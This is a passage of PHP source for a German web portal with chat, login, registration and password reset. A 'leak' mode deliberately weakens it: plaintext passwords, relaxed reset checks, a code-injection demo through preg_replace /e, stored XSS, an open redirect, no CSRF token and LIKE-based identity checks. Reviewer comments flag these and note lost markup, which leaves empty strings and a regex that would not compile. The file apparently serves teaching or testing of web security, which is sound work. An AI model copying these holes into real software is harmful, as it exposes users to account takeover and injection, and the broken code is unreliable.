# bit 1 of $status set, and expose the row to the Creole variables.
if(is_array($content) and $var = reset($content)) {
header('Last-Modified: '.date('r',$var['change']));
$head['cms'] = "";
if($var['right'] == 2 or $status/2%2)
$uedit = "CMS?id=$var[id]";
$creolevar = array_merge($creolevar,$var);
$content = $var['.content'];
}
# Link forwarding: content that consists of a single URL, path, fragment or "::l/" reference is sent
# as a Location header. The target comes from stored page content, so anyone who can edit a page
# decides where its visitors are redirected; external http(s) targets are accepted.
if(preg_match('!^(https?://|/|\.|#|::(?=l\/))[^<\s\'>]+$!',$content,$var)) { // link forwarding
if($var[1] == '::')
$content = strtr($content,array('::l' => $self, '::L' => $Self));
header("Location: $content");
die("$content
");
}
if($content)
$out .= "
";
$request .= " ";
}
# Datenbank beschreibbar
if($rw) {
# Pre-chat housekeeping: log users out when their idle time has expired, then clean up.
# One multi-statement call performs three steps:
# 1. auto logoff: clear bit 0 of status and the chat column for logged-in users whose last change is
#    older than $eos minutes;
# 2. reset the chat column of one user whose chat partner is no longer in a chat (in leak mode the
#    partner's status is not checked);
# 3. delete the messages of one chat channel that has no participant left.
# Steps 2 and 3 use "limit 1", so each request cleans up at most one user and one channel.
# Only $eos and the $leak switch are interpolated; no request data reaches this SQL text.
$sql['e']($conn,"
update [user] set status = (status/2%8*2), -- Autologoff
chat = null
where status = (status/2%8*2+1)
and datetime(change,'+$eos minutes') < datetime('now','localtime')
and status is not null;
update user set [chat] = null -- Aufraeumen
where id = ( select a.id
from [user] as a
left join [user] as b on a.chat = b.id".(($leak) ? "" : " and b.status > 0")." -- Chatpartner noch Online (Moeglicher Fehler: > 0)
where a.status is not null and a.chat > 0 and b.chat is null -- Chatter nicht gesperrt und noch Online (Moeglicher Fehler: > 0)
limit 1); -- und Chatpartner nicht im Chat
delete from [chat]
where chat = (select a.chat -- chatkanal
from [chat] as a
left join [user] as b on a.chat = b.chat -- Teilnehmer des Chatkanals
or a.chat <= 0 and a.user = b.id and status%2 = 1 -- Teilnehmer ist online
or abs(a.chat) = b.id and a.chat != b.id and (b.chat is null and status%2 = 1 or b.chat = b.id)
where b.id is null -- Keins der Bedingungen trifft zu!
group by a.chat
limit 1)");
# Chatline
if($request == 'Chat' and !$lone and $uid and $status%2) {
# $wait stays false for the script-driven chat; the NoScript branch below sets it to the reload delay.
$wait = false;
# Send the three no-cache response headers for the chat page.
# NOTE(review): $head[] receives an empty string as shown; the markup it presumably carried (the
# same values for the page head) appears to be lost in this copy.
foreach($array = array( // switch the browser cache off completely
'Cache-Control' => 'no-cache, no-store, must-revalidate',
'Pragma' => 'no-cache',
'Expires' => '0') as $key => $var) {
header("$key: $var");
$head[] = "";
}
if(isset($_REQUEST['chat']) and preg_match('/^(auth|call|edit|news|quit|send|sign|user|html)(?::(.*))?$/',$_REQUEST['chat'],$chat)) {
#html
# NoScript front end: translate plain form fields into the internal $chat command triple
# (index 1 = command, index 2 = argument) that the dispatcher below understands.
if($chat[1] == 'html') { // chat line without JavaScript
// reload delay in seconds: 1 to 3 digits, at least 30, default 30
$wait = (isset($_REQUEST['wait']) and preg_match('/^\d{1,3}$/',$_REQUEST['wait'],$var) and $var[0] >= 30) ? $var[0] : 30;
if($status/8%2) // switch encryption off
$sql['e']($conn,"update user set status = status%8 where id = $uid");
if(isset($_REQUEST['edit']) and preg_match('/^[01]$/',$_REQUEST['edit'],$var) and $var[0] != $status/4%2) // edit
$chat = array(0,'edit',$var[0]);
// call: "<user id>,<text>" is assembled from two fields; only the leading digits are checked here
elseif(isset($_REQUEST['call']) and isset($_REQUEST['user']) and isset($_REQUEST['line'])
and preg_match('/^\d+,.*$/',"$_REQUEST[user],$_REQUEST[line]",$var)) // call
$chat = array(0,'call',$var[0]);
elseif(isset($_REQUEST['quit'])) // quit
$chat[1] = 'quit';
elseif((isset($_REQUEST['send']) or isset($_REQUEST['doit'])) and isset($_REQUEST['line']) and $_REQUEST['line'] != '') // send
$chat = array(0,'send',$_REQUEST['line']);
// a pending chat request (stored under channel -$uid) is accepted automatically, or rejected with
// a leading '-' when chatting is off or the request carries a key exchange
elseif($var = $sql['aq']($conn,"select user,text from [chat] where chat = -$uid limit 1")) // auth
$chat = array(0,'auth',(($status/4%2 and !preg_match('/^key:\w+:/',$var[0]['text'])) ? '' : '-').$var[0]['user']);
}
else
$out = 0;
# Chat command dispatcher. $chat[1] is the command, $chat[2] its argument; $out becomes the plain
# text answer. Every argument that reaches SQL is either checked by a pattern that admits no quote
# character or passed through $sql['es'].
# Several branches call preg_replace() with the /e modifier, which evaluates the replacement as PHP
# code. The patterns used directly here admit only two hex digits or the characters % and ;, so the
# evaluated text is fixed; preg_replace_callback() is the replacement that also runs on PHP 7+.
#user
if($chat[1] == 'user') // transmit the user status
$out = implode(",",$sql['sq']($conn, /* id:status,chat,users; ... */ "
select u.id||','||ifnull(c.status,u.status)
from [user] as u
left join [user] as c on u.chat = c.chat
where u.status is not null
group by u.id"));
#edit
# The argument is a single digit out of 0,1,3,4,5,7 and is written into bits 2 and 3 of status.
elseif($chat[1] == 'edit' and @preg_match('/^[013457]$/',$chat[2]) and $sql['e']($conn, /* edit own chat status */"
update [user] set
status = status%4+(($chat[2]%2 + $chat[2]/4%2*2)*4)
where id = $uid"))
$out = $sql['c']($conn);
#auth
# Argument: "<id>" or "-<id>", optionally followed by ",<word>,<base64-like text>" for a key exchange.
# A negative id rejects the request and deletes it; a positive id joins both users into one chat and,
# when key material is present, stores it as a "key:...:" message.
elseif($chat[1] == 'auth' and preg_match('/^(-?\d+)(?:,(\w+),([=\w\/+]+))?$/',$chat[2],$var) and $sql['e']($conn, /* allow chat */"
update [user] set
chat = ".(($var[1] < 0) ? 'null' : 'chat*-1')."
where abs(chat) = $uid and id = abs($var[1]);".(($var[1] < 0) ? "
delete from [chat]
where chat = -$uid and user = abs($var[1])" : "
update [user] set
chat = id
where chat is null and id = $uid;
update [chat] set
chat = abs(chat)
where chat = -$uid and user = abs($var[1])".((count($var) > 3) ? ";
insert into [chat] (chat,user,time,text) values ($uid,$var[1],datetime('now','localtime'),'key:$var[2]/$var[3]:')" : ""))))
$out = $sql['c']($conn);
#send/sign
# 'send' posts into the sender's current chat, 'sign' (bit 1 of $status required) into channel 0.
# The text is HTML-escaped through $html. In leak mode, text that is not purely base64-like is also
# run through the $creole rule set; that is the path on which the code-injection demo of this file
# becomes reachable from chat input. Afterwards %xx sequences are decoded and the result is
# SQL-escaped.
elseif(($chat[1] == 'send' or $chat[1] == 'sign' and $status/2%2) and @preg_match('/^.+$/',$chat[2]) and $sql['e']($conn, /* send message */ "
insert into [chat] (chat,user,time,text) values (".(($chat[1] == 'send') ? $sql['sq']($conn,"select chat from [user] where id = $uid") : 0).",$uid,datetime('now','localtime'),'".$sql['es'](preg_replace('/%([\da-f]{2})/ei','chr(hexdec("$1"))',((preg_match('!^[\w+/]+=*$!',$chat[2]) or !$leak) ? strtr($chat[2],$html) : @preg_replace(array_keys($creole),array_values($creole),strtr($chat[2],$html)))))."')"))
$out = $sql['c']($conn);
#call
# Argument: "<user id>[,<text>]". The query resolves the chat to join (the partner's chat or the
# partner's id); the request is stored under the negative channel id together with the decoded text.
# NOTE(review): unlike 'send', the text is not passed through $html before it is stored -- confirm
# that every place rendering a chat request escapes it.
elseif($chat[1] == 'call' and preg_match('/^(\d+),?(.*)$/',$chat[2],$val) and ($var = $sql['sq']($conn,/* start chat */"
select ifnull(b.chat,a.id)
from user as a
left join [user] as b on b.chat = a.chat
left join ( select d.id,
count(d.chat) as chats
from user as d
left join user as e on d.chat = e.chat
group by d.id) as c on c.id = a.id
where (b.status%2 and b.status/4%2
or b.id is null and a.status%2 and a.status/4%2
or a.id = b.id and c.chats = 1) and a.id = $val[1]
limit 1")) !== false) // botnet workaround for replies
$out = $sql['e']($conn,"
update [user] set
chat = '-".intval($var)."'
where chat is null and id = $uid;
insert into [chat] (chat,user,time,text) values ('-".intval($var)."',$uid,datetime('now','localtime'),'".$sql['es'](preg_replace('/%([\da-f]{2})/ei','chr(hexdec("$1"))',$val[2]))."');");
#quit
# Leave the chat: drop the user's own open requests, then either release the channel (private chat
# or non-master participant) or hand the channel over to another participant when the master leaves.
elseif($chat[1] == 'quit' and $val = reset(($sql['aq']($conn, /* end chat */ "
select a.chat as chat,count(b.id) as users
from [user] as a
left join [user] as b on a.chat = b.chat
where a.id = $uid
group by a.id")))) {
$sql['e']($conn, /* delete open chat requests */ "
delete from [chat]
where user = $uid and chat < 0");
if(($val['chat'] and $val['chat'] != $uid or $val['users'] and $val['users'] < 3)) // only the client, or both in a private chat
$sql['e']($conn,"
update [user] set
chat = null
where chat = $val[chat]".(($val['users'] < 3) ? "" : " and id = $uid"));
elseif($val['chat'] == $uid and $var = $sql['sq']($conn,"select id from [user] where chat = $val[chat] and id != $uid limit 1")) // replace the master
$sql['e']($conn,"
update [user] set
chat = null
where id = $uid;
update [user]
set chat = $var
where chat = $val[chat];
update [chat] set
chat = $var
where chat = $uid");
$out = 1;
}
#news
# Polling endpoint. The answer is "<counters>;<max message id>;<n>[;user,time,text]...", where text
# has % and ; percent-encoded. The argument is the last message id the client has seen.
# NOTE(review): the pattern /\d*/ is unanchored and also matches the empty string, so it accepts any
# argument; the value only reaches SQL through intval().
elseif($chat[1] == 'news' and @preg_match('/\d*/',$chat[2])) { // query current chat news
$var = $sql['aq']($conn,"
select count(a.id), -- 0 Anzahl User
count(nullif(a.status%2,0)), -- 1 Anzahl der Logins
count(nullif(a.status/4%2,0)), -- 2 Anzahl der Chatter
count(nullif(a.status/8%2,0)), -- 3 Anzahl der Chatter
count(a.chat), -- 4 Anzahl der Chats
ifnull(sum(a.chat),0), -- 5 Hash der Chats
count(b.id), -- 6 Anzahl der Masters
ifnull((select chat from [user] where id = $uid),'-'), -- 7 Eigene Chat-ID
ifnull((select id from user where chat != $uid and abs(chat)=$uid limit 1),'-') -- 8 Erste ID von Chatanfrage(n)
from [user] as a
left join [user] as b on a.id = b.id and b.id = b.chat
where a.status is not null",SQLITE_NUM);
if($val = intval($var[0][8])) ## 9 first text of the chat request(s)
$var[0][] = preg_replace('/[%;]/e','"%".dechex(ord("$0"))',$sql['sq']($conn,"select text from chat where user = $val and chat = -$uid limit 1"));
$val = (isset($chat[2])) ? intval($chat[2]) : 0;
$wrt = intval($var[0][7]); // chat id
$out = implode(',',$var[0]).";";
$var = $sql['sq']($conn,"select ifnull(max(id),'0') from chat where chat = $wrt or chat = '0'"); // 1 max chat messages
$out .= "$var;";
if(isset($chat[2]) and $var > $val and $array = $sql['aq']($conn, /* 2 number of messages */ "
select user,strftime('%Y%m%d%H%M%S',time) as time,text
from [chat]
where (".(($wrt) ? "chat = $wrt or " : "")."chat = '0') and id > $val" /* do not show chat requests (allows the hack) */."
order by id") and count($array)) {
$out .= count($array);
foreach($array as $var)
$out .= ";$var[user],$var[time],".preg_replace('/[%;]/e','"%".dechex(ord("$0"))',$var['text']);
}
else
$out .= "0;";
}
#end
# State-changing commands count as user activity: refresh the timestamp that the idle logoff
# compares against and count the request. 'user', 'news' and 'auth' do not extend the login.
if(preg_match('/call|edit|quit|send|sign/',$chat[1])) // reset the user lifetime
$sql['e']($conn,"
update [user] set
change = datetime('now','localtime'),
requests = requests+1
where id = $uid");
# Final answer of a chat request. With $wait set (NoScript mode) the last ten messages of the
# user's chat are rendered as an HTML page; otherwise $out is sent as text/plain.
# NOTE(review): the HTML markup of the strings below appears to be missing in this copy (the
# per-message string is empty as shown), so how user name and message text are escaped in the
# NoScript page cannot be checked from here.
if($wait) { // output the HTML chat (NoScript)
$out = '';
if($chat = $sql['sq']($conn,"select chat from [user] where id = $uid")) {
$array = $sql['aq']($conn,"
select ifnull(u.username,'Unbekannt') as user,strftime('%d.%m.%Y %H:%M:%S',c.time) as time,c.text as text
from [chat] as c
left join [user] as u on u.id = c.user
where c.chat = $chat
order by c.time desc
limit 10");
foreach($array as $key => $var)
$array[$key] = "
";
$out = implode("\n",$array);
}
@header('Content-Type: text/html; charset=utf-8');
// the extra debug part is added only in leak mode or for users with bit 1 of $status, and only
// when a truthy 'debug' cookie is sent
$out = "" /* 4.01 Transitional */ ."
NoScript Chatline
\n".strtr($out,$uml)
.((($leak or $status/2%2) and isset($_COOKIE['debug']) and $_COOKIE['debug']) ? "".date('d.m.Y H:i:s')
."
" : "")."";
}
else
header('Content-Type: text/plain');
die("$out"); // output the result
}
# Build the chat page. $a becomes the JavaScript literal handed to the client: either 'false' or an
# array of $jschat['prime'], a second value and $jschat['base'].
# When $jschat['main'] is empty the second value is derived from the prime itself (rot13, reversed,
# first character dropped), so anyone who knows the prime can compute it.
# NOTE(review): the names suggest parameters of a key exchange; whether the second value is meant to
# be secret cannot be told from this view -- confirm before relying on the encrypted chat.
if(is_array($jschat) and is_array($jschat['crypt'])) { // prepare the encrypted chat
foreach($jschat['crypt'] as $key => $var)
$head["chat.$key"] = "";
$a = "['$jschat[prime]','".(($jschat['main']) ? $jschat['main'] : substr(strrev(str_rot13($jschat['prime'])),1))."',$jschat[base]]";
}
else
$a = 'false';
$rows = $sql['aq']($conn, /* build the chat GUI */ "
select id,username
from [user]
where status is not null
order by username");
# NOTE(review): the strings assigned in the two loops and to $var are empty as shown; the markup
# they carried appears to be lost in this copy, which also leaves $a unused here.
foreach($rows as $key => $var)
$rows[$key] = "";
$val = array(0 => 'Ablehnen', 1 => 'Erlauben', 3 => 'Zeigen');
foreach($val as $key => $var)
$val[$key] = "";
$var = "";
# With ?nojs the page is meant to be sent with its script parts and inline event handlers removed.
# NOTE(review): the pattern as shown starts with a quantifier and would not compile; it looks
# damaged by the same markup loss -- verify against the original file.
$out .= (isset($_GET['nojs'])) ? preg_replace("!?noscript>||\son(submit|click|change)='.*?'!s",'',$var) : $var;
}
elseif(isset($_REQUEST['chat'])) { // Gästen ermöglichen Admin-Messages zu Empfangen
# Guest polling: only the 'news' command is answered and only messages of channel 0 are returned.
# The answer is "0", or "0;<max id>;<n>;user,time,text..." with % and ; percent-encoded in the text.
# The client argument only reaches SQL through intval().
# NOTE(review): $chat[2] is read without an isset() check, so a bare "news" raises an
# undefined-offset notice before intval() turns it into 0.
$out = "0";
if(preg_match('/^(news)(?::(.+))?$/',$_REQUEST['chat'],$chat) and ($var = $sql['sq']($conn,"select ifnull(max(id),'0') from chat where chat = 0")) > ($val = intval($chat[2]))) {
$out .= ";$var;";
if($var > $val and $array = $sql['aq']($conn, /* 2 number of messages */ "
select user,strftime('%Y%m%d%H%M%S',time) as time,text
from [chat]
where chat = '0' and id > $val" /* do not show chat requests (allows the hack) */."
order by id") and count($array)) {
$out .= count($array);
foreach($array as $var)
// /e evaluates the replacement as PHP; the pattern admits only % and ; so the evaluated text is fixed
$out .= ";$var[user],$var[time],".preg_replace('/[%;]/e','"%".dechex(ord("$0"))',$var['text']);
}
}
header('Content-Type: text/plain');
die($out);
}
# Evaluate form input
// NOTE(review): POST data is processed when the session cookie equals the current session id
// (loose == comparison). A browser sends that cookie on its own, so this is not a request token;
// no separate anti-CSRF token is checked in the lines visible here.
if(count($_POST) > 0) {
if(isset($_COOKIE[session_name()]) and $_COOKIE[session_name()] == session_id()) { // Check for a valid session
// The failed-login counter flc lives in $_SESSION (it is incremented in the login section), so
// this limit is per session, not per account or per client address.
if(!$leak and isset($_SESSION['flc']) and $_SESSION['flc'] >= $flc) { // In security mode, make brute force harder
header('HTTP/1.0 403 Forbidden');
die("
Verboten!
");
}
# New registration
// Handles three form actions on the registration/data page: register (new account), change
// (update own data) and kill (deactivate account).
if(preg_match('/^(Dat|Anmeld)en$/',$request) and ($uid or $user) and (isset($_POST['register']) or isset($_POST['change']) or isset($_POST['kill']))) {
// Allow-list pattern per form field.
// NOTE(review): the patterns are applied unanchored below, so $val[0] is the first matching
// substring of the input rather than proof that the whole input is well-formed.
$array = array(
'username' => '[\w.-]{1,64}', 'password' => '[[:print:]]{0,64}', 'probate' => '[[:print:]]{0,64}',
'forename' => '[\w. -]{1,64}', 'lastname' => '[\w. -]{1,64}', 'question' => '\d{0,8}',
'myquestion' => '[\w,. ?-]{0,96}', 'answer' => '[\w. -]{0,96}', 'town' => '[\w. -]{0,64}',
'info' => '[^\']{0,255}', 'born' => '(\d{2}\.\d{2}\.(19|20)\d{2})?',
'mail' => '[\w.-]+@(localhost|[\w.-]+\.\w+|\[?[\d:a-f]+\]?)',
'page' => '((https?:\/\/)?([\w.-]+|\[[\d:a-f]+\])(:\d+)?(\/[\w:;.,_%?=\[\]\/-]*)?)?');
// $wrt: id of another account to edit, honoured only when the caller's status bit 1 is set.
$wrt = (floor($status%4/2) and isset($_POST['id']) and preg_match('/\d*/',$_POST['id'],$var)) ? $var[0] : false;
foreach($array as $key => $var)
if(isset($_POST[$key]) and preg_match("/$var/i",$_POST[$key],$val))
$post[$key] = strtr($val[0],$html);
// Continue only when every field matched and the password equals its confirmation ("probate").
if(isset($post) and count($post) == count($array) and $post['password'] == $post['probate']) {
if(isset($post['born']) and $post['born']) {
// dd.mm.yyyy -> yyyy-mm-dd; a date in the future is dropped.
$post['born'] = implode('-',array_reverse(explode('.',$post['born'])));
if(strtotime($post['born']) > time())
unset($post['born']);
}
$val = $post['probate'];
unset($post['probate']);
// In leak mode no salt is made and the password is stored exactly as submitted.
// NOTE(review): rand() and time() are predictable inputs for a salt; random_bytes() is the CSPRNG.
// Whether $hash[0] is a password-hashing function cannot be told from here - password_hash() and
// password_verify() are the safe default.
$salt = (!$leak) ? substr(preg_replace('/\W/','',crypt(rand().time())),-12) : false;
if($salt and $post['password'] != '')
$post['password'] = "salt:$salt-hash:".$hash[0]("$salt-$post[password]-".strtolower($post['username']));
// passhelp keeps the security question and its answer in clear text:
// "<question id>-<answer>" or "0-<own question>:<answer>".
if(isset($post['question']) and isset($post['answer']) and $post['answer'] != '' and ($post['question'] or isset($post['myquestion']) and $post['myquestion'] != ''))
$post['passhelp'] = ((!$post['question'] and $post['myquestion'] != '') ? "0-$post[myquestion]:" : "$post[question]-")."$post[answer]";
foreach(array('question','myquestion','answer') as $var)
unset($post[$var]);
// Every remaining value is SQL-escaped before it is placed into a statement below.
foreach($post as $key => $var)
$post[$key] = $sql['es']($var);
// Host names that are exempt from the DNS checks below.
$key = '(localhost|127(\.\d{1,3}){3}|::1|[\w.-]\.xx)';
// The password as typed ($val) is rejected when it is one of the words in $attack['_wordlist_'].
// NOTE(review): with $ipck set, the two branches after it call gethostbyname() on the mail domain
// and on the homepage host, i.e. a blocking DNS lookup for a name chosen by the submitter.
if(!$leak and array_search($val,explode(' ',$attack['_wordlist_'])) !== false)
$out .= "
Das Kennwort aus einen Wörterbuch ist zu einfach - Bitte ein sicheres wählen!";
elseif($ipck and !preg_match("/@$key$/",$post['mail']) and ($var = preg_replace('/^[^@]*@/','',$post['mail'])) == gethostbyname($var))
$out .= "
Die eMail-Adresse läßt sich nicht auflösen oder ist gerade Offline!
";
elseif($ipck and preg_match("/^$array[page]$/",$post['page'],$var) and count($var) > 3 and !preg_match("/^$key$/",$var[3]) and $var[3] == gethostbyname($var[3]))
$out .= "
Die Homepage-Adresse läßt sich nicht auflösen oder ist gerade Offline!
";
elseif($user and isset($_POST['register']) and $post['password'] != '') {
// Uniqueness check for user name and mail address.
// NOTE(review): LIKE treats '_' as a one-character wildcard and the user name pattern admits '_',
// so names that merely resemble an existing one also count as taken; '=' compares exactly.
if(!$var = $sql['aq']($conn,"
select (select username
from [user]
where username like '$post[username]') as user,
(select mail
from [user]
where mail like '$post[mail]') as mail
where user is not null
or mail is not null",SQLITE_NUM)) {
if($sql['sq']($conn,"select count(*) from [user]") == 0) // Admin
$post['status'] = 2;
// Column names come from the fixed keys above (plus passhelp/status), not from the request.
// NOTE(review): $key still holds the host pattern string at this point, so implode() receives a
// string; code that rebuilt it as a list may be missing from this copy.
if(!$sql['e']($conn,"
insert into [user] ([create],[change],[".implode("],[",array_keys($post))."])
values (datetime('now','localtime'),
datetime('now','localtime'),
'".implode("','",$post)."')"))
$out .= "
".implode(' und ',$key).((count($key) > 1) ? " sind" : " ist" )." schon im System vorhanden!
";
}
}
// change/kill need the current password in userpass. It is accepted when it equals the stored
// value, or when its salted hash equals the stored hash. Unless the caller has the admin bit, a
// value shaped like salt:...-hash:... is refused, so the stored string cannot be submitted as-is.
// NOTE(review): the hash comparison uses ==; hash_equals() compares strings exactly and in
// constant time.
elseif($uid and (isset($_POST['change']) or isset($_POST['kill'])) and isset($_POST['userpass'])
and ($status/2%2 or !preg_match('/^salt:\w+-hash:\w+$/',$_POST['userpass'])) and ($sql['sq']($conn,"
select count(*)
from [user]
where (username like '$post[username]' or id = '$wrt')
and password='".$sql['es']($_POST['userpass'])."'") or preg_match('/^salt:(.+?)-hash:(\w+)$/',$sql['sq']($conn,"
select password
from user
where (username like '$post[username]' or id = '$wrt')"),$var) and $var[2] == $hash[0]("$var[1]-$_POST[userpass]-".strtolower($post['username'])))) {
if(isset($_POST['change'])) {
// No new password given: re-store the current one salted, or leave the column untouched.
if($post['password'] == '')
if($salt and !preg_match('/^salt:\w+-hash:\w+$/',$_POST['userpass']))
$post['password'] = "salt:$salt-hash:".$hash[0]("$salt-$_POST[userpass]-".strtolower($post['username']));
else
unset($post['password']);
$array = array();
foreach($post as $key => $var)
$array[$key] = "[$key]='$var'";
$val = str_replace('=',' like ',$array['username']);
if($wrt)
$val = "($val or id = $wrt)";
// A matching row whose status is NULL (deactivated) is set back to status 0 first; errors are
// suppressed with @.
@$sql['e']($conn,"
update [user] set status=0
where $val and status is null");
// The update applies only to a row with status bit 0 set, or when the caller has the admin bit.
if(!$sql['e']($conn,"
update [user] set [change]=datetime('now','localtime'),
".implode(",",$array)."
where $val
and (status%2=1 or $status/2%2 = 1)"))
$out .= "
Ihre Daten konnten nicht geändert werden!
";
else
$request = 'Profil';
}
// kill deactivates the account by setting status to NULL; the row itself stays.
elseif(isset($_POST['kill']) and $var = $sql['sq']($conn,"
select id
from [user]
where [username] like '$post[username]'
and (status%2=1 or $status/2%2 = 1)")) {
$sql['e']($conn,"
update [user] set
[change]=datetime('now','localtime'),
[changes]=[changes]+1,
[status]=NULL
where id=$var");
$request = '';
}
}
else
$out .= "
Ihr altes Kennwort stimmt nicht!
";
}
else
$out .= "
Sie haben nicht alle Eingabefelder korrekt ausgefüllt!
";
}
# Forgotten password
// Resets a password after the security question is answered. In leak mode $wrt is empty, so mail
// address, forename and lastname are not required and the user name alone selects the account.
// NOTE(review): no failure counter is incremented in this section, so the flc limit checked at
// the top of the POST handler does not count wrong answers.
if(!$uid and isset($_POST['restore'])) {
$post = array();
$wrt = ($leak) ? array() : array(
'forename' => '[\w. -]{1,64}', 'lastname' => '[\w. -]{1,64}',
'mail' => '[\w.-]+@(localhost|[\w.-]+\.\w+|\[?[\d:a-f]+\]?)');
$array = array_merge($wrt,array( 'question' => '\d{1,8}',
'answer' => '[\w. -]{1,96}', 'username' => '[\w.-]{1,64}',
'password' => '[[:print:]]{1,64}', 'probate' => '[[:print:]]{1,64}'));
// Same unanchored allow-list extraction as in the registration section. The values are placed
// into SQL below without $sql['es'], so safety rests on these patterns admitting no quote.
foreach($array as $key => $var)
if(isset($_POST[$key]) and preg_match("/$var/i",$_POST[$key],$val))
$post[$key] = strtr($val[0],$html);
if(isset($post['username']) and ($leak or isset($post['mail']) and isset($post['forename']) and isset($post['lastname']))) {
// Load the stored passhelp value; the question id (and the user's own question text for id 0)
// replaces whatever the form sent.
if($var=$sql['sq']($conn,"select passhelp from [user] where username like '$post[username]'".(($leak) ? "" : " and mail like '$post[mail]'")) and preg_match('/^(\d+)-(?:(?<=0-)(.+?):)?/',$var,$var)) {
if(!$post['question'] = $var[1])
$post['myquestion'] = ($var[2] != '') ? $var[2] : false;
}
else
$out .= "
Das Kennwort kann nicht zurückgesetzt werden, da keine Sicherheitsfrage hinterlegt wurde!
";
if(isset($post['password']) and isset($post['probate']) and $post['password'] == $post['probate']) {
// NOTE(review): the new password is written with SQL escaping only. Unlike registration, no
// salt:...-hash:... value is built here, in either mode.
// NOTE(review): every comparison in the WHERE clause uses LIKE, and the field patterns admit '_',
// which LIKE treats as a one-character wildcard. '=' compares exactly, which is what an
// identity check needs.
// $sql['c'] presumably returns the number of changed rows - confirm.
if(isset($post['question']) and isset($post['answer']) and ($leak or isset($post['forename']) and isset($post['lastname'])) and $sql['e']($conn,"
update [user]
set password='".$sql['es']($post['password'])."'
where username like '$post[username]'".(($leak) ? "" : "
and mail like '$post[mail]'
and forename like '$post[forename]'
and lastname like '$post[lastname]'")."
and passhelp like '$post[question]-".((!$post['question'] and isset($post['myquestion']) and $post['myquestion']) ? "$post[myquestion]:" : "")."$post[answer]'") and $sql['c']($conn)) {
$request = '';
$out .= "
Ihr Kennwort wurde jetzt neu gesetzt!
";
// $row lets the login section below run with the same POST data.
$row = true;
}
else {
$out .= "
Die Sicherheitsfrage muss korrekt beantwortet werden!
Sie haben noch kein neues korrektes Kennwort vergeben!
";
}
else
$out .= "
Sie müssen alle Felder ausfüllen!
";
}
# Perform login
// Runs for an explicit login or directly after a successful password reset ($row).
if(!$uid and ($row or isset($_POST['login'])) and isset($_POST['username']) and isset($_POST['password'])) {
// User name: characters outside the allow-list are removed. Password: non-printables are removed.
$post = array( 'username' => preg_replace('/[^\w.:@\[\]-]+/','',$_POST['username']),
'password' => preg_replace('/[^[:print:]]/','',$_POST['password']));
// The account is looked up by user name or mail address, then one of three proofs is accepted:
//  1. the submitted password equals the stored value (a submission shaped like
//     salt:...-hash:... is blanked first, so the stored string cannot be replayed);
//  2. the salted hash of the submitted password equals the stored hash;
//  3. outside leak mode, "<user>:<hash>" where the hash covers $_SESSION['sha'] and the stored
//     password value or its hash part.
// NOTE(review): for proof 3 the stored value is itself the secret, i.e. password-equivalent.
// NOTE(review): all comparisons use ==; hash_equals() compares strings exactly and in constant
// time. The lookup uses LIKE, where '_' in the submitted name is a wildcard.
if(($val = $sql['aq']($conn,"
select id,username,password,status,change
from [user]
where (username like '$post[username]'
or mail like '$post[username]')
and status is not null")) and $val = $val[0] and (preg_replace('/^salt:\w+-hash:\w+$/','',$post['password']) == $val['password']
or preg_match('/^salt:(.+?)-hash:(\w+)$/',$val['password'],$var) and $var[2] == $hash[0]("$var[1]-$post[password]-".strtolower($val['username']))
or !$leak and isset($_SESSION['sha']) and preg_match('/^([@\w.-]+):(\w+)$/',$post['password'],$var) and $var[1] == $post['username']
and ($var[2] == $hash[0]("$_SESSION[sha]-".$val['password']) or $var[2] == $hash[0]("$_SESSION[sha]-".preg_replace('/^salt:\w+-hash:(\w+)$/','$1',$val['password']))))) {
// NOTE(review): the session data is cleared, but session_regenerate_id() is not called in this
// section, so the session id from before the login stays in use.
foreach($_SESSION as $key => $var)
unset($_SESSION[$key]);
$uid = $val['id'];
// Keep the higher status bits and set bit 0 (logged in).
$status = floor($val['status']/2)*2+1;
$_SESSION['lua'] = $val['change'];
$_SESSION['uid'] = $uid;
// Session id, User-Agent and the optional info field are SQL-escaped; $addr is set outside this
// excerpt - confirm that it is validated there.
$sql['e']($conn,"
update [user] set
status=(status/2%8*2+1),
logins=logins+1,
requests=requests+".((isset($_SESSION['src'])) ? $_SESSION['src'] : 0).",
change=datetime('now','localtime'),
ip='$addr',
session='".$sql['es'](session_id())."',
useragent='".$sql['es']($_SERVER['HTTP_USER_AGENT'])."'".((isset($_POST['info'])) ? ",
info=nullif('".$sql['es']($_POST['info'])."','')" : "")."
where id=".$val['id']);
if(isset($_SESSION['src']))
unset($_SESSION['src']);
if(!$request and !$query)
$request = 'Profil';
// "forever" stores a login cookie "<uid>.<hash of username:stored password>" for $ctl seconds.
// NOTE(review): that token stays valid until the stored password value changes, and both
// setcookie() calls omit the secure and httponly arguments.
if(isset($_POST['forever']) and $_POST['forever'])
setcookie('login',"$uid.".$hash[0]("$val[username]:$val[password]"),time()+$ctl,$self);
else
setcookie('username',$val['username']);
}
else {
// Failed attempt: blank the password and, outside leak mode, count the failure in the session.
$post['password'] = '';
if(!$leak)
$_SESSION['flc'] = (isset($_SESSION['flc'])) ? $_SESSION['flc'] + 1 : 1;
}
}
# Save profile
// Stores the profile text for the logged-in user. When uid names another account, the write is
// allowed only if the caller's own row has status%4 = 3.
// NOTE(review): the text is SQL-escaped but not HTML-encoded here (other sections apply
// strtr(...,$html) before storing); the author marks this as the XSS case, so encoding has to
// happen wherever the profile is displayed.
if($uid and !isset($_POST['stop']) and !isset($_POST['test']) and isset($_POST['profil']) and $sql['e']($conn,"
update [user] set
change=datetime('now','localtime'),
changes=changes+1,
profil=nullif('".$sql['es']($_POST['profil'])."','')
where id=".((isset($_POST['uid']) and $_POST['uid'] != $uid and preg_match('/\d+/',$_POST['uid'],$var)) ? "$var[0]
and (select status
from [user]
where id=$_SESSION[uid])%4 = 3" : "$_SESSION[uid] and status%2=1"))) // XSS
$request = 'Profil';
# Edit blog
// An existing post may be rewritten only by its author: the mail field must equal $uid and the
// userid stored for the post. Title and message pass strtr(...,$html) and are then SQL-escaped;
// the User-Agent header is SQL-escaped. $addr is set outside this excerpt.
if($request == 'Beitrag' and $uid and isset($_POST['save']) and isset($_POST['mail']) and isset($_POST['message']) and isset($_POST['title']) and isset($_POST['id']) and preg_match('/\d+/',$_POST['id'],$var)
and $uid == $_POST['mail'] and $_POST['mail'] == $sql['sq']($conn,"select userid from [forum] where id = $var[0]") and $sql['e']($conn,"
update [forum] set".((isset($_POST['right']) and preg_match('/[01]/',$_POST['right'],$val)) ? "\n\t\tstatus=status/2%2*2+$val[0]%2," : "")."
change=datetime('now','localtime'),
changes=changes+1,
ip='$addr',
useragent='".$sql['es']($_SERVER['HTTP_USER_AGENT'])."',
title=nullif('".$sql['es'](strtr($_POST['title'],$html))."',''),
